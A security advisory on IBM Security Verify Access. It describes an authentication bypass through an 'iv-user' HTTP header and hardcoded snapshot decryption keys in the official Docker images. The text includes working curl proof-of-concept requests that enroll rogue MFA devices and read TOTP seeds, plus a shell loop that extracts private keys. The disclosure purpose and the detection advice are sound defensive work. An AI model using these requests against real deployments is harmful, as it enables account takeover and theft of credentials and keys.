Runtime\n\nIt is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance. \n\nThe threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance). \n\nThe IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn... \n\nThe different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header `iv-user: target-user` (e.g. `iv-user: admin`) in the HTTPS requests. \n\nAdding an additional HTTP header `iv-user: target-user` when querying the APIs will provide a complete control over the `target-user`. \n\nThere is a HTTPs server reachable on port 443/tcp providing APIs:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nUsually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as `easuser`, as shown below:\n\nDocumentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:\n\n\u003e Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface\n\u003e \n\u003e Certificate authentication\n\u003e\n\u003e Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e\n\u003e   User ID and password authentication\n\u003e\n\u003e Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e   The default username is easuser and the default password is passw0rd. \n\n\nAttack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (`easuser`). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nNote that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs. \n\nAccording to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the `/mga/sps/*` path. Actually, the `/mga/` route seems to be managed by WebSEAL servers while the `/sps/*` routes are managed by the runtime docker instance. \n\nWithout authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the `/sps/oauth/oauth20/authorize?client_id=ClientID\u0026response_type=code\u0026scope=mmfaAuthn` API endpoint and specifying which target user to compromise using the additional HTTP header `iv-user: target-user`. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) for the `target-user` user. \n\nBy specifying the HTTP header `iv-user: target-user`, an attacker can interact with all the APIs located in `/sps/*` for any user, without authentication. \n\nListing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA. \n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . \n    {\n      \"result\": \"FBTRBA306E The user management operation failed because the user is not authenticated.\"\n    }\n\nListing of authenticators for the `target-user` - with `iv-user` HTTP header (without session cookies nor specific credentials):\n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n    [\n      {\n        \"device_name\": \"Iphone 13 Pro Max\",\n        \"oauth_grant\": \"uuida71[REDACTED]\",\n        \"auth_methods\": [],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REDACTED]\",\n        \"id\": \"uuid20[REDACTED]\",\n        \"enabled\": true\n      },\n      {\n        \"device_name\": \"Iphone 13 Pro Max\",\n        \"oauth_grant\": \"uuida71[REDACTED]\",\n        \"auth_methods\": [],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REDACTED]\",\n        \"id\": \"uuid20[REDACTED]\",\n        \"enabled\": true\n      },\n    [...]\n    kali% \n\nIt is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying `iv-user: target-user` in the HTTP header:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nA PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user `target-user`. Note that the `client_id` variable must be edited as we use the specific TestAuthenticatorClient client identifier. \nThe valid `client_id` variable can be retrieved from the `/sps/mga/user/mgmt/grant` API:\n\n    kali% curl -kv -H \"iv-user: target-user\" https://test-runtime/sps/mga/user/mgmt/grant | jq . \n    {\n      \"grants\": [\n        {\n          \"id\": \"uuida71[REDACTED]\",\n          \"isEnabled\": true,\n          \"clientId\": \"TestAuthenticatorClient\",\n    [...]\n\nI suggest using the specific `client_id` identifier configured in the targeted instance. The correct `client_id` identifier can also be obtained by visiting `https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`. The `device_selection.html` webpage is just a front-end to get access to several APIs:\n\n- - /sps/mga/user/mgmt/grant\n- - /sps/mmfa/user/mgmt/authenticators\n- - /sps/fido2/registrations\n- - /sps/mga/user/mgmt/device \n- - /sps/apiauthsvc/policy/u2f_register\n- - /sps/mga/user/mgmt/clients\n- - ... \n\nFor example, visiting a remote IBM Security Verify Runtime instance at`https://url/sps/mga/user/mgmt/html/device/device_selection.html` without an `iv-user: target-user` HTTP header will return empty information (since the resulting requests sent to APIs are not \"authenticated\"):\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nVisiting the same address `https://url/sps/mga/user/mgmt/html/device/device_selection.html` using Burp Suite Pro, and (i) adding a HTTP Header `iv-user: target-user` in all the resulting HTTP requests and (ii) rewriting the URL from `^\\/mga\\/sps\\/` to `\\/sps\\/` (since the `/mga/` path is hardcoded in JavaScript code) will now provide a full access for the `target-user` (adding an authenticator, deleting an authenticator, adding passkeys, ...). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nAn attacker can also add an new authenticator for any user using curl:\n\nPoC:\n\n    kali% curl -kv \"https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn\" -H \"iv-user: target-user\"          \n    * Host test-runtime:443 was resolved. \n    * IPv6: (none)\n    * IPv4: 10.0.0.15\n    *   Trying 10.0.0.15:443... \n    * Connected to test-runtime (10.0.0.15) port 443\n    * using HTTP/1.x\n    \u003e GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient\u0026response_type=code\u0026scope=mmfaAuthn HTTP/1.1\n    \u003e Host: test-runtime\n    \u003e User-Agent: curl/8.5.0\n    \u003e Accept: */*\n    \u003e iv-user: target-user\n    \u003e \n    \u003c HTTP/1.1 302 Found\n    \u003c X-Frame-Options: SAMEORIGIN\n    \u003c Pragma: no-cache\n    \u003c Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\n    \u003c Content-Language: en-US\n    \u003c Transfer-Encoding: chunked\n    \u003c Date: Sat, 07 Sep 2024 12:07:21 GMT\n    \u003c Expires: Thu, 01 Dec 1994 16:00:00 GMT\n    \u003c Cache-Control: no-store, no-cache=set-cookie\n    \u003c \n    * Connection #0 to host test-runtime left intact\n \nThe resulting secret `code` provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) corresponding to the `target-user`. \n\nIn order to import this secret token inside an IBM Verify Security application (an authenticator), we can:\n\n- - reach the `https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient\u0026code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y` webpage (without `/mga` at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from `/mga/sps/` to `/sps/`; or\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n- - reach the `/sps/mmfa/user/mgmt/qr_code/json` API to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code (note that in the next HTTP answer, the `ignoreSslCerts=true` is not the default option); or\n\n\u003cpre\u003e\nGET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient HTTP/1.1\nHost: test-runtime\niv-user: target-user\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n\nHTTP/1.1 200 OK\nContent-Type: application/json\nX-Frame-Options: SAMEORIGIN\nPragma: no-cache\nContent-Language: en-US\nConnection: Close\nDate: Sat, 07 Sep 2024 20:39:55 GMT\nExpires: Thu, 01 Dec 1994 16:00:00 GMT\nCache-Control: no-store, no-cache=set-cookie\nContent-Length: 202\n\n{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=true\",\n\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\n\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\n\u003c/pre\u003e\n\n- - reach the `/mga/sps/mmfa/user/mgmt/qr_code/json` API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-faced WebSEAL servers) to get the json encoded data inside the QR code (using `?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\u0026client_id=TestAuthenticatorClient`) and generate the QR code; or\n\n- - simply locally generate the QR code containing the JSON data as shown below using the `qrencode` program:\n\n\u003cpre\u003e\n    kali% qrencode -o picture.png \u0027{\"code\":\"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y\",\"options\":\"ignoreSslCerts=false\",\"details_url\":\"https:\\/\\/enroll-url\\/mga\\/sps\\/mmfa\\/user\\/mgmt\\/details\",\"version\":1,\"client_id\":\"TestAuthenticatorClient\"}\u0027\n\u003c/pre\u003e\n\nThen the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) in order to enroll a new device. By default, the specific `https://enroll-url/mga/sps/mmfa/user/mgmt/details` is always reachable from the Internet in order to successfully enroll smartphones. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en) has been used and successfully enrolled for the `target-user` and can now be used to authenticate as `target-user`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe device has been correctly enrolled from the Internet as shown below, by using the `/sps/mmfa/user/mgmt/authenticators` API without authentication. \n\n    kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H \"iv-user: target-user\" | jq . \n    [\n      {\n        \"device_name\": \"Samsung S22\",\n        \"oauth_grant\": \"uuida72253ef[REDACTED]\",\n        \"auth_methods\": [\n          {\n            \"key_handle\": \"32e[REDACTED].userPresence\",\n            \"id\": \"uuidb694[REDACTED]\",\n            \"type\": \"user_presence\",\n            \"enabled\": true,\n            \"algorithm\": \"SHA256withRSA\"\n          }\n        ],\n        \"os_version\": \"13\",\n        \"device_type\": \"[REMOVED]\",\n        \"id\": \"uuidb4fde[REDACTED]\",\n        \"enabled\": true\n      },\n    [...]\n\n\nFurthermore, all the APIs in `/sps/*` are directly reachable by specifying the HTTP header `iv-user: target-user`. \n\nWe can also list the secret key for the seed corresponding to OTP:\n\n    kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H \"iv-user: target-user\" | jq .          \n    {                                  \n      \"period\": \"30\",\n      \"secretKeyUrl\": \"otpauth://totp/Example:target-user\"?secret=NSJ[REDACTED][REDACTED][REDACTED]\u0026issuer=Example\",\n      \"secretKey\": \"NSJ[REDACTED][REDACTED][REDACTED]\",\n      \"digits\": \"6\",\n      \"username\": \"target-user\",\n      \"algorithm\": \"HmacSHA1\"\n    }\n\n\nAll the APIs located in `/sps/` are vulnerable to this authentication bypass. \n\nAs shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user. \n\nAn attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user. \n\nAt the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected. \n\nThe latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is **strongly recommended** to implement this authentication mechanism and not to expose the ISVA runtime instance to the network. \n\n**Without this optional authentication, any malicous actor (i) with access to WebSEAL servers (with a shell or a SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with a shell access to any \u0027trusted\u0027 machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials**. \n\nRegarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:\n\n- - From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;\n- - And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\n- From my understanding, this vulnerability is not going to be patched (no security bulletin was published and no CVE has been assigned, ticket has been closed as solved) because, according to the official recommendations, it is the customer\u0027s responsability to filter any communication to the runtime instance. This present security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture. \n\nAbout the detection of insecure instances, a HTTPS request to the `/sps/` route providing the banner `Server: IBM Security Verify Access` in the HTTPS answer will allow SOC team to detect an instance. The banner will not appear when reaching `https://test-runtime/`). If MFA is used, a HTTP request to `/sps/mga/user/mgmt/html/device/device_selection.html` (port `443` or `9443`, by default) will allow SOC team to detect an insecure ISVA runtime instance. An answer indicating `200 OK` with the content of the `device_selection.html` webpage will indicate that the tested instance is probably insecure:\n\n    kali% curl -k https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html\n    [...]\n    \u003c HTTP/1.1 200 OK\n    \u003c X-Frame-Options: SAMEORIGIN\n    \u003c Server: IBM Security Verify Access\n    \u003c Content-Type: text/html;charset=UTF-8\n    [...]\n    \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n    \u003chtml\u003e\n    \n    \u003chead\u003e\n      \u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"\u003e\n      \u003ctitle\u003eDevice Selection\u003c/title\u003e\n      \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/static/design.css\"\u003e\u003c/link\u003e\n      \u003clink type=\"text/css\" rel=\"stylesheet\" href=\"/sps/mga/user/mgmt/html/device/device_selection.css\"\u003e\u003c/link\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/mgmt_msg.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/static/u2fI18n.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/common.js\"\u003e\u003c/script\u003e\n      \u003cscript type=\"text/javascript\" src=\"/sps/mga/user/mgmt/html/device/device_selection.js\"\u003e\u003c/script\u003e\n\nOn a side note, from my tests, the APIs are also exposed with authentication from the Internet by visiting `https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`. If `device_selection.html` is blocked, it is simply possible to inject the correct answer with Burp Suite Pro (using the `device_selection.html` webpage available in official IBM Docker images) and the previous `/mga/sps/` APIs are still reachable since they are needed to successfully enroll an authenticator from the Internet (e.g. the official IBM Verify Security App running on a smartphone). An attacker that enrolled a rogue authenticator to a compromised account can get persistence access from the Internet even if the runtime instance is not reachable anymore or if the \"regular\" ISVA servers are only reachable from inside the company: the APIs provided by the Internet-faced enrolling server will allow the attackers to enroll new authenticators and retrieve current seeds. \n\nFurthermore, with Internet-faced servers (by design, to enroll authenticators) and an authenticated session, the attack surface is quite big. \n\nIt is also possible to list the target version of a Internet-faced instance (proxifed through WebSEAL) by visiting the `/mga/sps/mmfa/user/mgmt/details` API (when MFA is enabled in ISVA):\n\n    curl -s https://internet-faced-website/mga/sps/mmfa/user/mgmt/details | jq . \n    {\n      \"authntrxn_endpoint\": \"https://info.domain.tld/scim/Me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:transactionsPending,urn:ietf:params:scim:schemas:extension:isam:1.0:MMFA:Transaction:attributesPending\",\n      \"metadata\": {\n        \"service_name\": \"Organisation\",\n        \"qrlogin_endpoint\": \"https://info.domain.tld/mga/sps/authsvc?PolicyId=urn:ibm:security:authentication:asf:qrcode_response\"\n    [...]\n      \"enrollment_endpoint\": \"https://info.domain.tld/scim/Me\",\n    [...]\n      \"version\": \"10.0.8.0\",\n    [...]\n    }\n\n\n\n## Details - Reuse of snapshot private keys\n\nThe official Docker images have been retrieved and analyzed on a local machine:\n\n    kali-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    kali-docker# docker save 498e181d7395 \u003e ibmcom/verify-access-runtime.tar\n    kali-docker# docker save c0003aca743c \u003e ibmcom/verify-access-wrp.tar\n    kali-docker# docker save 206efdd7809c \u003e ibmcom/verify-access.tar\n    kali-docker# docker save 959f6f1095e9 \u003e ibmcom/verify-access-dsc.tar\n\nIt was observed that instances contain custom encryption/decryption keys (`device_key.kdb` and `device_key.sth` files) located inside `/var/.ca/`. \n\nThese keys are used by the `isva_decrypt` utility present in all the images. For example, the `/usr/sbin/bootstrap.sh` script will decrypt the stored openldap.zip file using `isva_decrypt`:\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n    [...]\n    # Decrypt and extract the LDAP configuration. \n    isva_decrypt $snapshot_tmp_dir/openldap.zip\n\n    unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n    [...]\n\nWhen doing an analysis on the official IBM images obtained on Docker Hub, we can confirm the keys (`device_key.kdb` and `device_key.sth`) are in fact hardcoded inside these official IBM images and some of them are also world-readable by default:\n\n    kali-docker# ls -la */*/var/.ca/*            \n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n    -rw------- 1 root root 5991 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n    -rw------- 1 root root  193 Jun  8 01:31 _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n    -rw-r--r-- 1 root root 5991 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n    -rw-r--r-- 1 root root  193 Jun  8 01:29 _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n    \n    kali-docker# sha256sum */*/var/.ca/*|sort|uniq\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.sth\n    dc47d4cfd4fb21ebaad215b2bca4f7d5c5f32e7c3b6678dc69a570ad534628ce  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.sth\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-runtime.tar/2bf2e32495580fbf5de2abb686d8727c10372a2f7a717ad2608f18362c6c7960/var/.ca/device_key.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/.ca/mesa_ca.kdb\n    f06cd909fd9b4222b4ac228ae71702428505d162255d83cc51e93be5edd8d935  _verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a/var/.ca/device_key.kdb\n\nUsing these keys and the `IBM Crypto for C` programs, we can successfully decrypt the `openldap.zip` file - an encrypted zip file - available inside the `default.snapshot` file - this file contains the entire configuration of ISVA and is stored inside Docker instances or retrieved over the network. The `openldap.zip` file contains all the configuration options of the instance and is consequently extremely sensitive (to decrypt it using `isva_decrypt`, it is required to create a `/var/.ca` directory containing `device_key.kdb` and `device_key.sth` in a test machine):\n\n    kali-decryption% LD_LIBRARY_PATH=/home/user/gsk8_64/lib64 strace ./isva_decrypt openldap.zip\n    [...]\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"2s\\0\\0etc/openldap/schema/nis.ldif\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\321\\0\\0etc/openldap/schema/collectiv\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"\\0etc/openldap/slapd-replica.conf\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"data/secAuthority-default/__db.0\"..., iov_len=1024}], 2) = 1024\n    read(4, \"\\271=b\\223\\205\\320\\277\\365\\207\\302#T\\255\\355\\374Ct\\222\\332M`3%\\341\\361I\\301\\233j\\34\\1\\355\"..., 8191) = 1124\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"PK\\1\\2\\36\\3\\24\\0\\0\\0\\10\\0\\4Z-UQ\\202\\212\u003cV\\2\\0\\0\\0 \\0\\0000\\0\\30\\0\"..., iov_len=1024}], 2) = 1024\n    writev(5, [{iov_base=\"\", iov_len=0}, {iov_base=\"+\\0\\30\\0\\0\\0\\0\\0\\0\\0\\0\\0\\200\\201\\256\\213\\7\\0var/openldap/d\"..., iov_len=1024}], 2) = 1024\n    read(4, \"\", 8191)                       = 0\n    close(4)                                = 0\n    write(5, \"\\5\\0\\3\\250\\302\\36cux\\v\\0\\1\\4\\0\\0\\0\\0\\4\\0\\0\\0\\0PK\\5\\6\\0\\0\\0\\0[\\0\"..., 44) = 44\n    close(5)                                = 0\n    unlink(\"openldap.zip\")                  = 0\n    rename(\"/tmp/tmp.pxiQjh\", \"openldap.zip\") = 0\n    unlink(\"/tmp/tmp.pxiQjh\")               = -1 ENOENT (No such file or directory)\n    close(3)                                = 0\n    exit_group(0)                           = ?\n    +++ exited with 0 +++\n    kali-decryption% file openldap.zip \n    openldap.zip: Zip archive data, at least v1.0 to extract, compression method=store\n\nWhile doing an analysis of the zip file, we can find:\n\n- - credentials;\n- - passwords (e.g. in `etc/openldap/dynamic/replica-1.conf` and `etc/openldap/dynamic/passwd.conf`)\n- - RSA keys + certificates (e.g. in `etc/openldap/dynamic/server.key`)\n- - users in the logs. \n\nThe unique kdb files (encrypted archives containing public and private keys) found in the IBM Docker images have also been decrypted (using the corresponding stash files) and analyzed:\n\n    kali-docker# j=0; for file in ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb; do echo $file; LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw password ; openssl pkcs12 -in /tmp/tmp.p12 -out /tmp/export_${j}.pem -nodes -passin pass:password;j=$(($j+1));rm /tmp/tmp.p12;done\n    ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/lum/iss-external.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/iss-external.kdb\n    ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/opt/ibm/ldap/V6.4/etc/ldapkey.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/trial/trial_ca.kdb\n    ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/isva.signing/isva_signing_public.kdb\n    ./_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/var/.ca/device_key.kdb\n\nThis allows an attacker to extract several private keys:\n\n    Bag Attributes\n        friendlyName: ca\n        localKeyID: 03 82 01 01 00 6F 9B 85 F2 CA 2A DC A3 2E BA F7 D9 36 40 D4 D4 4D 31 A4 AC 23 2E 6E F0 9F 04 90 D7 F5 EC D1 31 7C 39 DB 80 20 7D A2 6C F5 30 F1 B6 C0 8C 1D 9F 32 87 A0 84 FE 22 AC 8F 0E D8 36 03 6D 69 29 E2 57 0C B3 9B 05 C4 E0 1E 81 51 EB 33 49 C3 D3 E1 F2 4E C0 CA 0C 5A A8 F9 5D 54 1F CF BE C0 9A 70 C4 6F 94 65 70 14 9F 1B 74 29 6E EB 00 1F 55 9B FE A1 00 CC FB DC CD 20 35 64 DF D6 A5 A7 F4 FB 76 DB D5 AA 6D 67 08 B1 F8 0B 71 37 AF A2 90 C3 AA 57 38 5B 48 E7 AE 35 6C 0C 8A E3 99 7D 90 94 B0 F8 1E 13 17 F9 A9 2F 5F 87 35 8B 